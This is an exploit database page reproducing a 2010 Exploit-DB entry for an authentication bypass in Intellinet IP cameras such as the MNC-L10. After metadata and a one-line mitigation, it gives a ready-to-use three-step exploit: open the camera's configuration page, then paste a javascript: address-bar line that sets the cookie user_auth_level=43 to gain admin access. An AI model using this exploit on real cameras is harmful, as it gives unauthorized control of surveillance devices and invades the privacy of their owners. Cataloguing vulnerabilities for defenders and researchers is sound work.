header-logo
Suggest Exploit
vendor:
IP Camera
by:
Magnefikko
8,8
CVSS
HIGH
Cookie Injection
200
CWE
Product Name: IP Camera
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2010

Intellinet IP Camera Admin Access

Intellinet IP Camera MNC-L10 and other models are vulnerable to a cookie injection attack. An attacker can inject a cookie with user_auth_level=43 to gain admin access to the camera.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a cookie.
Source

Exploit-DB raw data:

by Magnefikko
Discovered: 25.01.2009
Publication: 01.08.2010
magnefikko@gmail.com
Promhyl Studies :: http://promhyl.tk
Inj3ct0r Team :: http://inj3ct0r.com
Subgroup: #PRekambr
Name: Intellinet IP Camera Admin Access
Platform: Intellinet IP Camera MNC-L10 and other


...:: Exploit ::...

JS is required.

1. Go to http://cameraip/main_configure.cgi
2. Write in address bar:
--- code ---
javascript:document.cookie="user_auth_level=43";document.location=document.location
--- code ---
3. Push enter.

or add cookie with another method.


----== Promhyl Studies :: http://promhyl.tk ==----
----== Inj3ct0r Team :: http://inj3ct0r.com ==----

Navigation

Suggest Exploit

Services By CQR